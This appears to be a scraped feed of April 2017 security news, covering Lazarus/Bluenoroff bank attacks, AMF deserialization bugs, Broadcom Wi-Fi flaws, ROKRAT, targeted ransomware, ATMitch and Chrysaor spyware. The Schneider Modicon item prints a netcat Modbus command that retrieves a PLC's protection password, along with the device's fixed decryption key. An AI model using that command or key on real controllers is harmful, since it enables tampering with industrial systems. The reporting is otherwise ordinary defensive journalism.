In February 2017 an article in the Polish media broke the silence on a long-running story about attacks on banks, allegedly related to the notoriously known Lazarus Group. While the original article didn’t mention Lazarus Group it was quickly picked up by security researchers. Today we’d like to share some of our findings, and add something new to what’s currently common knowledge about Lazarus Group activities, and their connection to the much talked about February 2016 incident, when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank.

Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist. One such publication was made available by BAE systems in May 2016, however it only included analysis of the wiper code. This was followed by another blogpost by Anomali Labs, confirming the same wiping code similarity. This similarity was found to be satisfying to many readers, however at Kaspersky Lab, we were looking for a stronger connection.

Other claims that Lazarus was the group behind attacks on the Polish financial sector, came from Symantec in 2017, which noticed string reuse in malware at one of their Polish customers. Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers. However, from this it’s only clear that Lazarus might have attacked Polish banks.

While all these facts are fascinating, the connection between Lazarus attacks on banks, and their role in attacks on banks’ systems, was still loose. The only case where specific malware targeting the bank’s infrastructure used to connect to SWIFT messaging server was discovered, is the Bangladesh Central Bank case. However, while almost everybody in the security industry has heard about the attack, few technical details have been revealed to the public based on the investigation that took place on site at the attacked company. Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers, it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions, or if Lazarus had in fact developed its own malware to attack banks’ systems.

We would like to add some strong facts that link some attacks on banks to Lazarus, and share some of our own findings as well as shed some light on the recent TTPs used by the attacker, including some yet unpublished details from the attack in Europe in 2017.

This is the first time we announce some Lazarus Group operations that have thus far gone unreported to the public. We have had the privilege of investigating these attacks and helping with incident response at a number of financial institutions in South East Asia and Europe. With cooperation and support from our research partners, we have managed to address many important questions about the mystery of Lazarus attacks, such as their infiltration method, their relation to attacks on SWIFT software and, most importantly, shed some light on attribution.

 

Lazarus attacks are not a local problem and clearly the group’s operations span across the whole world. We have seen the detection of their infiltration tools in multiple countries in the past year. Lazarus was previously known to conduct cyberespionage and cybersabotage activities, such as attacks on Sony Pictures Entertainment with volumes of internal data leaked, and many system harddrives in the company wiped. Their interest in financial gain is relatively new, considering the age of the group, and it seems that they have a different set of people working on the problems of invisible money theft or the generation of illegal profit. We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations, while a substantially smaller units within the group, which we have dubbed Bluenoroff, is responsible for financial profit.

The watering hole attack on Polish banks was very well covered by media, however not everyone knows that it was one of many. Lazarus managed to inject malicious code in many other locations. We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia. Lazarus/Bluenoroff regrouped and rushed into new countries, selecting mostly poorer and less developed locations, hitting smaller banks because they are, apparently, easy prey.

To date, we’ve seen Bluenoroff attack four main types of targets:

Financial institutions
Casinos
Companies involved in the development of financial trade software
Crypto-currency businesses
Here is the full list of countries where we have seen Bluenoroff watering hole attacks:

Mexico
Australia
Uruguay
Russian Federation
Norway
India
Nigeria
Peru
Poland
Of course, not all attacks were as successful as the Polish attack case, mainly because in Poland they managed to compromise a government website. This website was frequently accessed by many financial institutions making it a very powerful attack vector. Nevertheless, this wave of attacks resulted in multiple infections across the world, adding new hits to the map we’ve been building.
 

One of the most interesting discoveries about Lazarus/Bluenoroff came from one of our research partners who completed a forensic analysis of a C2 server in Europe used by the group. Based on the forensic analysis report, the attacker connected to the server via Terminal Services and manually installed an Apache Tomcat server using a local browser, configured it with Java Server Pages and uploaded the JSP script for C2. Once the server was ready, the attacker started testing it. First with a browser, then by running test instances of their backdoor. The operator used multiple IPs: from France to Korea, connecting via proxies and VPN servers. However, one short connection was made from a very unusual IP range, which originates in North Korea.

 

In addition, the operator installed an off-the-shelf cryptocurrency mining software that should generate Monero cryptocoins. The software so intensely consumed system resources that the system became unresponsive and froze. This could be the reason why it was not properly cleaned, and the server logs were preserved.

This is the first time we have seen a direct link between Bluenoroff and North Korea. Their activity spans from backdoors to watering hole attacks, and attacks on SWIFT servers in banks of South East Asia and Bangladesh Central Bank. Now, is it North Korea behind all the Bluenoroff attacks after all? As researchers, we prefer to provide facts rather than speculations. Still, seeing IP in the C2 log, does make North Korea a key part of the Lazarus Bluenoroff equation.

Conclusions

Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011 and activities didn’t disappear after Novetta published the results of its Operation Blockbuster research, in which we also participated. All those hundreds of samples that were collected give the impression that Lazarus is operating a factory of malware, which produces new samples via multiple independent conveyors.

We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers. Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.

Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, same code, and the same algorithms. “Keep morphing!” seems to be their internal motto. Those rare cases when they are caught with same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing.

This level of sophistication is something that is not generally found in the cybercriminal world. It’s something that requires strict organisation and control at all stages of operation. That’s why we think that Lazarus is not just another APT actor.

Of course such processes require a lot of money to keep running, which is why the appearance of the Bluenoroff subgroup within Lazarus was logical.

Bluenoroff, being a subgroup of Lazarus, is focusing on financial attacks only. This subgroup has reverse engineering skills because they spend time tearing apart legitimate software, and implementing patches for SWIFT Alliance software, in attempts to find ways to steal big money. Their malware is different and they aren’t exactly soldiers that hit and run. Instead, they prefer to make an execution trace to reconstruct and quickly debug the problem. They are field engineers that come when the ground is already cleared after conquering new lands.

One of Bluenoroff’s favorite strategies is to silently integrate into running processes without breaking them. From the code we’ve seen, it looks as if they are not exactly looking for a hit and run solution when it comes to money theft. Their solutions are aimed at invisible theft without leaving a trace. Of course, attempts to move around millions of USD can hardly remain unnoticed, but we believe that their malware might be secretly deployed now in many other places and it isn’t triggering any serious alarms because it’s much more quiet.

We would like to note, that in all of the observed attacks against banks that we have analyzed, SWIFT software solutions running on banks’ servers haven’t demonstrated or exposed any specific vulnerability. The attacks were focused on banking infrastructure and staff, exploiting vulnerabilities in commonly used software or websites, bruteforcing passwords, using keyloggers and elevating privileges. However, the way banks use servers with SWIFT software installed requires personnel responsible for the administration and operation. Sooner or later, the attackers find these personnel, gain the necessary privileges, and access the server connected to the SWIFT messaging platform. With administrative access to the platform they can manipulate software running on the system as they wish. There is not much that can stop them, because from a technical perspective, their activities may not differ from what an authorized and qualified engineer would do: starting and stopping services, patching software, modifying the database. Therefore, in all the breaches we have analyzed, SWIFT, as an organization has not been at direct fault. More than that, we have witnessed SWIFT trying to protect its customers by implementing the detection of database and software integrity issues. We believe that this is a step in the right direction and these activities should be extended with full support. Complicating the patches of integrity checks further may create a serious threat to the success of future operations run by Lazarus/Bluenoroff against banks worldwide.

To date, the Lazarus/Bluenoroff group has been one of the most successful in launching large scale operations against the financial industry. We believe that they will remain one of the biggest threats to the banking sector, finance and trading companies, as well as casinos for the next few years. We would like to note that none of the financial institutions we helped with incident response and investigation reported any financial loss.

As usual, defense against attacks such as those from Lazarus/Bluenoroff should include a multi-layered approach. Kaspersky products include special mitigation strategies against this group, as well as the many other APT groups we track. If you are interested in reading more about effective mitigation strategies in general, we recommend the following articles:

Strategies for mitigating APTs
How to mitigate 85% of threats with four strategies
We will continue tracking the Lazarus/Bluenoroff actor and share new findings with our intel report subscribers, as well as with the general public. If you would like to be the first to hear our news, we suggest you subscribe to our intel reports.


Flaws in Java AMF Libraries Allow Remote Code Execution

5.4.2017 secureweek Vulnerebility 

Deserialization-related vulnerabilities found in several Java implementations of AMF3 can be exploited for unauthenticated remote code execution and XXE attacks, warned CERT/CC.

The security holes were reported to CERT/CC and vendors by Markus Wulftange, senior penetration tester at Code White. Patches have been made available for some of the affected products.

Serialization is the process where an object is converted to a stream of bytes in order to store or transmit that object to memory or a file. The process in which serialized data is extracted is called deserialization and it can lead to significant security flaws if not handled properly.

AMF3, the latest version of Adobe’s Action Message Format, is a compact binary format used to serialize ActionScript object graphs. AMF was first introduced in Flash Player 6 in 2001 and AMF3 has been around since Flash Player 9.

There have been several reports in the past few years about remote code execution vulnerabilities introduced in Java-based applications due to inadequate serialization implementations.

Wulftange has discovered that some Java implementations of AMF3 deserializers introduce potentially serious vulnerabilities, allowing unauthenticated attackers to remotely execute code or cause a denial-of-service (DoS) condition. An XXE flaw reported by the researcher can also lead to disclosure of sensitive data on the server.

CERT/CC’s advisory mentions three vulnerabilities. The first flaw allows an attacker who can spoof or control an RMI (Remote Method Invocation) server to execute code. This security hole is said to affect Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.

The second vulnerability can also be exploited for arbitrary code execution by an attacker who can spoof or control information. This weakness impacts Flamingo, Apache’s Flex BlazeDS and GraniteDS. The XXE flaw has been found to affect the same products along with WebORB.

Some of the vulnerable libraries, such as GraniteDS and Flamingo, have been discontinued. Atlassian and Apache have released patches for the flaws impacting their products.

According to CERT/CC, products from HPE, SonicWall and VMware could also be affected. The organization has advised developers to use versions of JDK that implement serialization blacklisting filters and ensure that their products properly handle deserialized data from untrusted sources.


Still problems for Schneider Electric, Schneider Modicon TM221CE16R has a hardcoded password
5.4.2017 securityaffairs Security

The firmware running on the Schneider Modicon TM221CE16R (Firmware 1.3.3.3) has a hardcoded password, and there is no way to change it.
I believe it is very disconcerting to find systems inside critical infrastructure affected by easy-to-exploit vulnerabilities while we are discussing the EU NIS directive.

What about hard-coded passwords inside critical systems?

Unfortunately, it’s happened again, the firmware running on the Schneider Modicon TM221CE16R (Firmware 1.3.3.3) has a hardcoded password. The bad news for users is that they a cannot change the password and there is no firmware update available to fix this issue.

The firmware encrypted the XML file containing user and password with the fixed key “SoMachineBasicSoMachineBasicSoMa”.

It is quite easy for an attacker to open the control environment (SoMachine Basic 1.4 SP1), decrypt the file, and take control over the device.

“The password for the project protection of the Schneider Modicon TM221CE16R is hard-coded and cannot be changed.” reads the security advisory published by Simon Heming, Maik Brüggemann, Hendrik Schwartke, Ralf Spenneberg of Germany’s Open Source Security.”The protection of the application is not existent.”

Schneider Modicon TM221CE16R

The same team of researchers discovered another security issue affecting the Schneider TM221CE16R Firmware 1.3.3.3 hardware. The experts discovered that the password used to protect the applications can be easily retrieved by a remote unauthenticated user. The Application Protection is used to prevent the transfer of the application from a logic controller into a SoMachine Basic project.

“The password for the application protection of the Schneider Modicon TM221CE16R can be retrieved without authentication. Subsequently the application may be arbitrarily downloaded, uploaded and modified. CVSS 10.” reads a separate security advisory published by the team.

The experts discovered that a user just needs to send the following command over Modbus using TCP Port 502:

echo -n -e '\x00\x01\x00\x00\x00\x05\x01\x5a\x00\x03\x00' | nc IP 502
“After that the retrieved password can be entered in SoMachine Basic to download, modify and subsequently upload again any desired application”, continues the advisory.


Download and install the last iOS 10.3.1, attackers can hack you over Wi-Fi
5.4.2017 securityaffairs Apple

A critical flaw could be exploited by attackers within range to “execute arbitrary code on the Wi-Fi chip,” download and install last iOS 10.3.1 version.
Last week, Apple released iOS 10.3, an important release of the popular operating system the fixed more than 100 bugs and implements security improvements.

Apple opted to push an emergency patch update (iOS 10.3.1 version), that fixed some critical vulnerabilities, including one tracked as CVE-2017-6975. The flaw could be exploited by attackers within range to “execute arbitrary code on the Wi-Fi chip.”
The flaw was first discovered by the expert Gal Beniamini from the Google’s Project Zero team, the expert and his team did not disclose technical details on the flaw.

“Impact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip

Description: A stack buffer overflow was addressed through improved input validation.

ios 10.3.1 release

CVE-2017-6975: Gal Beniamini of Google Project Zero” reads the security note published by Apple for the iOS 10.3.1 release.

The CVE-2017-6975 affects iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later
iPhone 5S was not affected because it is the first model based on a 64-bit processor.

Today Beniamini will publish a detailed technical analysis of the issue, including a detailed description of the attack scenario.The iOS 10.3.1 update can be downloaded via Settings → General → Software Update on your iOS device.
Apple users already running the iOS 10.3 can download and install the iOS 10.3.1 release simply pressing on the “Download and Install” button to install the update.

If you are the owner of an Apple iPhone, iPad and iPod Touch you must update your device as soon as possible.


Millions Of Smartphones Using Broadcom Wi-Fi Chip Can Be Hacked Over-the-Air
5.4.2017 thehackernews Mobil


Millions of smartphones and smart gadgets, including Apple iOS and many Android handsets from various manufacturers, equipped with Broadcom Wifi chips are vulnerable to over-the-air hijacking without any user interaction.
Just yesterday, Apple rushed out an emergency iOS 10.3.1 patch update to address a serious bug that could allow an attacker within same Wifi network to remotely execute malicious code on the Broadcom WiFi SoC (Software-on-Chip) used in iPhones, iPads, and iPods.
The vulnerability was described as the stack buffer overflow issue and was discovered by Google's Project Zero staffer Gal Beniamini, who today detailed his research on a lengthy blog post, saying the flaw affects not only Apple but all those devices using Broadcom's Wi-Fi stack.
Beniamini says this stack buffer overflow issue in the Broadcom firmware code could lead to remote code execution vulnerability, allowing an attacker in the smartphone's WiFi range to send and execute code on the device.
Attackers with high skills can also deploy malicious code to take full control over the victim's device and install malicious apps, like banking Trojans, ransomware, and adware, without the victim's knowledge.
In his next blog post that's already on its way, Beniamini will explain how attackers can use their assumed control of the Wi-Fi SoC in order to further escalate their privileges into the application processor, taking over the host’s operating system.
Over-the-Air Broadcom Wi-Fi SoC Hack

According to the researcher, the firmware running on Broadcom WiFi SoC can be tricked into overrunning its stack buffers, which allowed him to send carefully crafted WiFi frames, with abnormal values, to the Wi-Fi controller in order to overflow the firmware's stack.
Beniamini then combined this value with the frequent timer firings of the chipset to gradually overwrite specific chunks of device's memory (RAM) until his malicious code is executed.
So, to exploit the flaw, an attacker needs to be within the WiFi range of the affected device to silently take over it.
"While the firmware implementation on the Wi-Fi SoC is incredibly complex, it still lags behind in terms of security," Beniamini explains. "Specifically, it lacks all basic exploit mitigations – including stack cookies, safe unlinking and access permission protection."
The researcher also detailed a proof-of-concept Wi-Fi remote code execution exploit in the blog post and successfully performed it on a then-fully updated (now fixed) Nexus 6P, running Android 7.1.1 version NUF26K – the latest available Nexus device at the time of testing in February.
The flaw is one of the several vulnerabilities discovered by Beniamini in the firmware version 6.37.34.40 of Broadcom Wi-Fi chips.
Security Patch for Nexus & iOS Released; Others Have to Wait!
Google Project Zero team reported the issue to Broadcom in December. Since the flaw is in Broadcom's code, smartphone makers had to wait for a patch from the chip vendor before testing the patch and pushing it out to their own user base.
Both Apple and Google addressed the vulnerability with security updates released on Monday, with Google delivering updates via its Android April 2017 Security Bulletin and Apple releasing the iOS 10.3.1 update.
The flaw still affects most Samsung flagship devices, including Galaxy S7 (G930F, G930V), Galaxy S7 Edge (G935F, G9350), Galaxy S6 Edge (G925V), Galaxy S5 (G900F), and Galaxy Note 4 (N910F), the researcher says.
For more technical details head on to the blog post published by Google Project Zero team today.


Wi-Fi Flaws Expose iPhone, Nexus Phones to Attacks

5.4.2017 securityweek  Vulnerebility

Vulnerabilities in Broadcom’s Wi-Fi system-on-chip (SoC) can be exploited to hijack iPhone, Nexus, Samsung and other smartphones without requiring any user interaction.

Google Project Zero researcher Gal Beniamini has identified several remote code execution, privilege escalation and information disclosure vulnerabilities in Broadcom firmware.

Since Broadcom’s Wi-Fi chips are widely used, the flaws affect many devices, including Google’s Nexus 5, 6 and 6P, all iPhones since iPhone 4, and most of Samsung’s flagship Android smartphones.

Beniamini has published a lengthy blog post describing the Broadcom Wi-Fi chipset and vulnerabilities that can be exploited for remote code execution. The researcher has also promised to publish another blog post that will provide details on the second part of the exploit chain, which involves elevating privileges from the SoC to the operating system’s kernel.

An attacker who is in Wi-Fi range can exploit the security holes found by the Google researcher to take complete control of a vulnerable device without any user interaction.

Beniamini applauded Broadcom’s response, stating that the company was responsive and helpful in fixing the vulnerabilities and making the patches available to affected device manufacturers.

The researcher said Broadcom’s firmware lacks all basic exploit mitigations, but the company claims newer versions do include some security mechanisms and exploit mitigations are being considered for future versions.

Apple released an emergency update this week for iOS to address the remote code execution vulnerability (CVE-2017-6975), but the company did not provide any details.

The Broadcom flaws were also patched in Android with the release of the April security updates.

Samsung has also released maintenance updates this week for its Android devices. The updates include both the Google patches and fixes for vulnerabilities specific to Samsung products.


South Korean users targeted with a new stealthy malware, the ROKRAT RAT
5.4.2017 securityaffairs Virus

Security experts at CISCO Talos have spotted a new insidious remote access tool dubbed ROKRAT that implements sophisticated anti-detection measures.
The ROKRAT RAT targets Korean users, people using the popular Korean Microsoft Word alternative Hangul Word Processor (HWP). In the past, we saw other attacks against people using the HWP application.

ROKRAT RAT

The ROKRAT RAT was used in a phishing campaign detected several weeks, attackers leveraged on weaponized documents as attachments.

“This actor is quick to cover their tracks and very quickly cleaned up their compromised hosts. We believe the compromised infrastructure was live for a mere matter of hours during any campaign,” reads the analysis published by Cisco Talos researchers Warren Mercer, Paul Rascagneres and Matthew Molyett.

The experts speculate the involvement of a sophisticated threat actor that aimed to compromise systems of South Korean users in the public sector.

The attackers sent phishing messages from an email address tied to South Korea’s Yonsei University on the topic of an upcoming and fictitious “Korean Reunification and North Korean Conference”.

The attackers compromised a legitimate email address of a big forum powered by a university in Seoul to send out spear phishing email.

The attackers attempted to trick victims into open the attachments to provide feedback to conference organizers. Phishing emails contain two HWP documents that embed Encapsulated PostScript (EPS) object.

“The purpose of the EPS is to exploit a well-known vulnerability (CVE-2013-0808) to download a binary disguised as a .jpg file. This file is decoded and finally an executable is launched: ROKRAT,” said researchers.

The EPS flaw, tracked as CVE-2013-0808, was discovered in 2013, it is an EPS viewer buffer overflow vulnerability, that could be exploited by attackers to execute arbitrary code on targeted machines.

“An HWP document is composed by OLE objects. In our case, it contains an EPS object named BIN0001.eps. As with all HWP documents the information is zlib compressed so you must decompress the .eps to get the true shellcode.” continues the analysis.

The shellcode is used to trigger the CVE-2013-0808 vulnerability and download the ROKRAT RAT binary from the command and control server. The binary is dropped as a .jpg file named “worker.jpg” or “kingstone.jpg”.

If the malware detects a sandbox environment it will block its activity and try to deceive security researchers by generating fake traffic.

The malware appears to connect and load either an Amazon video of a game called “Men of War” or a Hulu anime video called “Golden Time”.

The security experts warned of similar attacks against other high-value targets, it is possible that threat actors can exploit the EPS vulnerability to target also Microsoft Word users.

The experts also noticed observed an evolution of the ROKRAT RAT, it is using new communication channels, such as Twitter and Yandex and Mediafire cloud platforms.

In this way, the attacker can make hard the detection of the malicious traffic and leverages also the use of HTTPS connectivity implemented by these services.

“This investigation shows us once again that South Korean interests sophisticated threat actors.” concludes the analysis.

“This campaign shows us a motivated malware actor. The usage of HWP (an application mainly used in Korea) and the fact that emails and documents are perfectly written in Korean suggests that the author is a native Korean speaker.”


Ransomware in targeted attacks
5.4.2017 Kaspersky Virus

Ransomware’s popularity has attracted the attention of cybercriminal gangs; they use these malicious programs in targeted attacks on large organizations in order to steal money. In late 2016, we detected an increase in the number of attacks, the main goal of which was to launch an encryptor on an organization’s network nodes and servers. This is due to the fact that organizing such attacks is simple, while their profitability is high:

The cost of developing a ransom program is significantly lower compared to other types of malicious software.
These programs entail a clear monetization model.
There is a wide range of potential victims.
Today, an attacker (or a group) can easily create their own encryptor without making any special effort. A vivid example is the Mamba encryptor based on DiskCryptor, an open source software. Some cybercriminal groups do not even take the trouble of involving programmers; instead, they use this legal utility “out of the box.”
 

DiskСryptor utility

The model of attack looks like this:

Search for an organization that has an unprotected server with RDP access.
Guess the password (or buy access on the black market).
Encrypt a node or server manually.
 

Notification about encrypting the organization’s server

The cost to organize such an attack is minimal, while the profit could reach thousands of dollars. Some partners of well-known encryptors resort to the same scheme. The only difference is the fact that, in order to encrypt the files, they use a version of a ransom program purchased from the group’s developer.

However, true professionals are also active on the playing field. They carefully select targets (major companies with a large number of network nodes), and organize attacks that can last weeks and go through several stages:

Searching for a victim
Studying the possibility of penetration
Penetrating the organization’s network by using exploits for popular software or Trojans on the infected network nodes
Gaining a foothold on the network and researching its topology
Acquiring the necessary rights to install the encryptor on all the organization’s nodes/servers
Installing the encryptor
Recently, we have written about one of these types of ransomware, PetrWrap, on our blog.
 

The screen of a machine infected with PetrWrap

Of special note is the software arsenal of a few groups that is used to penetrate and anchor in an organization’s network. For example, one of the groups used open source exploits for the server software that was being used on the server of the victim organization. Once the attackers had exploited this vulnerability, they installed an open sourced RAT tool, called PUPY, on the system.
 

Pupy RAT description

Once they had gained a foothold in the victim network, the attackers used a Mimikatz tool to acquire the necessary access rights, and then installed the encryptor on the network using PsExec.

Considering the above, we can conclude that the scenario of ransomware infection in a target attack differs significantly from the usual infection scenario (malicious email attachments, drive-by-attacks, etc.). To ensure comprehensive security of an organization’s network, it is necessary to audit the software installed on all nodes and servers of the network. If any outdated software is discovered, then it should be updated immediately. Additionally, network administrators should ensure all types of remote access are reliably protected.

Of special note is the fact that, in most cases, the targets of attacks are the servers of an organization, which means that they should be safeguarded by security measures. In addition, the constant process of creating backup copies must be imperative; this will help bring the company’s IT infrastructure back to operational mode quickly and with minimal financial loss.


ATMitch: remote administration of ATMs
5.4.2017 Kaspersky Virus

In February 2017, we published research on fileless attacks against enterprise networks. We described the data collected during incident response in several financial institutions around the world, exploring how attackers moved through enterprise networks leaving no traces on the hard drives. The goal of these attackers was money, and the best way to cash out and leave no record of transactions is through the remote administration of ATMs. This second paper is about the methods and techniques that were used by the attackers in the second stage of their attacks against financial organizations – basically enabling remote administration of ATMs.

In June 2016, Kaspersky Lab received a report from a Russian bank that had been the victim of a targeted attack. During the heist, the criminals were able to gain control of the ATMs and upload malware to them. After cashing out, the malware was removed. The bank’s forensics specialists were unable to recover the malicious executables because of the fragmentation of a hard drive after the attack, but they were able to restore the malware’s logs and some file names.

The bank’s forensic team were able, after careful forensic analysis of the ATM’s hard drive, to recover the following files containing logs:

C:\Windows\Temp\kl.txt
C:\logfile.txt
In addition, they were able to find the names of two deleted executables. Unfortunately, they were not able to recover any of the contents:

C:\ATM\!A.EXE
C:\ATM\IJ.EXE
Within the log files, the following pieces of plain text were found:

[Date – Time]
[%d %m %Y – %H : %M : %S] > Entering process dispense.
[%d %m %Y – %H : %M : %S] > Items from parameters converted successfully. 4 40
[%d %m %Y – %H : %M : %S] > Unlocking dispenser, result is 0
[%d %m %Y – %H : %M : %S] > Catch some money, bitch! 4000000
[%d %m %Y – %H : %M : %S] > Dispense success, code is 0

As mentioned in the previous paper, based on the information from the log file we created a YARA rule to find a sample, in this case: MD5 cef6c2aa78ff69d894903e41a3308452. And we’ve found one. This sample was uploaded twice (from Kazakhstan and Russia) as “tv.dll”.

 

The malware, which we have dubbed ATMitch, is fairly straightforward. Once remotely installed and executed via Remote Desktop Connection (RDP) access to the ATM from within the bank, the malware looks for the “command.txt” file that should be located in the same directory as the malware and created by the attacker. If found, the malware reads the one character content from the file and executes the respective command:

‘O’ – Open dispenser
‘D’ – Dispense
‘I’ – Init XFS
‘U’ – Unlock XFS
‘S’ – Setup
‘E’ – Exit
‘G’ – Get Dispenser id
‘L’ – Set Dispenser id
‘C’ – Cancel
After execution, ATMitch writes the results of this command to the log file and removes “command.txt” from the ATM’s hard drive.

The sample “tv.dll” successfully retrieved in this case does not try to conceal itself within the system.

 

The malware’s command parser

The malware uses the standard XFS library to control the ATM. It should be noted that it works on every ATM that supports the XFS library (which is the vast majority).

Unfortunately, we were unable to retrieve the executables (!A.exe and IJ.exe, located in C:\ATM) from the ATM; only the file names were found as artefacts during the forensic analysis. We assume that these are the installer and uninstaller of the malware. It should also be noted that “tv.dll” contained one Russian-language resource.

Kaspersky Lab continues to monitor and track these kinds of threats and reiterates the need for whitelisting in ATMs as well as the use of anti-APT solutions in banking networks.


Android Chrysaor spyware went undetected for years
5.4.2017 securityaffairs Android

Chrysaor spyware is an Android surveillance malware that remained undetected for at least three years, NSO Group Technology is suspected to be the author.
Security experts at Google and Lookout spotted an Android version of one of the most sophisticated mobile spyware known as Chrysaor that remained undetected for at least three years. due to its smart self-destruction capabilities.The experts, in fact, were not able to analyse the threat due to its smart self-destruction capabilities. The Chrysaor spyware has been found installed on fewer than three-dozen Android devices.
Chrysaor was used in targeted attacks against journalists and activists, mostly located in Israel, other victims were in Georgia, Turkey, Mexico, the UAE and other countries. Experts believe the Chrysaor espionage Android malware was developed by the Israeli surveillance firm NSO Group Technologies.
Experts believe the Chrysaor espionage Android malware was developed by the Israeli surveillance firm NSO Group Technologies, we met this company when researchers spotted its Pegasus iOS spyware in the wild.
The Chrysaor Android spyware implements several features including:
Exfiltrating data from popular apps including Gmail, WhatsApp, Skype, Facebook, Twitter, Viber, and Kakao.
Controlling device remotely from SMS-based commands.
Recording Live audio and video.
Keylogging and Screenshot capture.
Disabling of system updates to prevent vulnerability patching.
Spying on contacts, text messages, emails and browser history.
Self-destruct to evade detection
chrysaor spyware
The surveillance firm NSO Group Technologies produce the best surveillance technology to governments, law enforcement agencies worldwide, but privacy advocates and activists accuse the firm of selling its malware also to dictatorial regimes.

“Although the applications were never available in Google Play, we immediately identified the scope of the problem by using Verify Apps,” reads a blog post published by Google.

“We’ve contacted the potentially affected users, disabled the applications on affected devices, and implemented changes in Verify Apps to protect all users.”

The threat was hard to analyse because it has the ability to delete itself when detect any suspicious activity that could be related to its detection.
“Pegasus for Android will remove itself from the phone if:

The SIM MCC ID is invalid
An “antidote” file exists
It has not been able to check in with the servers after 60 days
It receives a command from the server to remove itself
rchers believe that Chrysaor APK has also been distributed via SMS-based phishing messages, just like Pegasus infection on iOS devices.” reads the analysis published by Lookout.
Chrysaor exploits a well-known Android-rooting exploit called Framaroot to root the device and gain full control over the mobile device.

The experts noticed that the Chrysaor spyware back to 2014, this means that it is possible that NSO group might have discovered zero-day vulnerabilities in Android OS and has implemented the exploit code in the latest version of Chrysaor spyware.

Lookout published a detailed analysis of the Chrysaor spyware titled “Pegasus for Android: Technical Analysis and Findings of Chrysaor.”


Update Your Apple Devices to iOS 10.3.1 to Avoid Being Hacked Over Wi-Fi
5.4.2017 thehackernews Apple
Less than a week after Apple released iOS 10.3 with over 100 bug fixes and security enhancements; the company has just pushed an emergency patch update – iOS 10.3.1 – to addresses a few critical vulnerabilities, one of which could allow hackers to "execute arbitrary code on the Wi-Fi chip."
The vulnerability, identified as CVE-2017-6975, was discovered by Google's Project Zero staffer Gal Beniamini, who noted on Twitter that more information about the flaw would be provided tomorrow.
Apple also did not provide any technical details on the flaw, but urged Apple iPhone, iPad and iPod Touch users to update their devices as soon a possible.
In the security note accompanying iOS 10.3.1, Apple describes the issue as a stack buffer overflow vulnerability, which the company addressed by improving the input validation.
A stack buffer overflow flaw occurs when the execution stack grows beyond the memory that is reserved for it, allowing hackers to execute malicious code remotely.
The flaw allows an attacker, within range, to execute malicious code on the phone's Wi-Fi chip.
The vulnerability appears to affect iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation, and later devices running the iOS 10.3 operating system.
It's worth mentioning that iPhone 5 and iPhone 5C were Apple's last iPhone handsets to have a 32-bit processor with Apple A6 system on a chip. Since iPhone 5S has a 64-bit processor, it is not affected by the issue.
To know more technical details about the flaw, you are required to wait until tomorrow when Beniamini will release a detailed blog post describing the bug and its impact on Apple users.
With iOS 10.3 release, an over-the-air download for 32-bit Apple devices wasn't available. This has also being changed with iOS 10.3.1 update, which brings back support for iPhone 5 and 5C as well as the fourth-generation iPad -- the only remaining 32-bit Apple devices.
The iOS 10.3.1 update can be downloaded over-the-air via Settings → General → Software Update on your iOS device.
Apple users running iOS 10.3 should be able to see the iOS 10.3.1 update, so press on the "Download and Install" button to install the update.


Ecuador's New President Warns Assange Not to 'Meddle'

4.4.2017 securityweek BigBrothers
Ecuador's President-elect Lenin Moreno warned Julian Assange on Tuesday not to meddle in the country's politics, after the WikiLeaks founder taunted a rival candidate following his loss.

Moreno's election victory Sunday was a relief for Assange, who has been holed up in Ecuador's London embassy since 2012 to avoid arrest.

The socialist president-elect's conservative rival, Guillermo Lasso, had vowed to kick Assange out of the embassy.

But Moreno had some stern words after Assange took to Twitter to celebrate Lasso's loss.

"Mr Julian Assange must respect the condition (of asylum) he is in and not meddle in Ecuadoran politics," he said at a news conference.

As results showed Lasso losing on election night, Assange had exuberantly turned around the right-wing candidate's threat to expel him within 30 days.

"I cordially invite Lasso to leave Ecuador within 30 days (with or without his tax haven millions)," he tweeted -- a reference to allegations the ex-banker has money stashed in offshore accounts.

Assange fled to the embassy to avoid arrest and extradition to Sweden, where he faces a rape allegation.

The 45-year-old Australian, who denies the allegation, says he fears Sweden would send him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents in 2010.

Outgoing President Rafael Correa, a fiery critic of the US, granted Assange asylum, and Moreno has vowed to uphold it.

Assange's case has returned to the spotlight since WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and her Democratic party.

That created an awkward situation for the Ecuadoran government, which responded by temporarily restricting his internet access.


New RAT Uses Popular Sites for Command and Control

4.4.2017 securityweek Virus
A newly discovered remote administration tool (RAT) uses popular legitimate websites for its command and control (C&C) communication and for the exfiltration of data, Talos researchers say.

Dubbed ROKRAT, the tool is distributed via email with a malicious Hangul Word Processor (HWP) document and targets victims in Korea, where the Office alternative is highly popular. Researchers found that one of the malicious spear phishing emails was sent from the email server of Yonsei, a private university in Seoul. To add legitimacy to the email, the attackers used the contact email of the Korea Global Forum as the sender’s address.

The malicious HWP document contained an embedded Encapsulated PostScript (EPS) object aimed at exploiting a well-known vulnerability (CVE-2013-0808) to download a binary masquerading as a .jpg file. When the file is decoded and executed, the ROKRAT malware is installed on the victim’s machine, Talos explains.

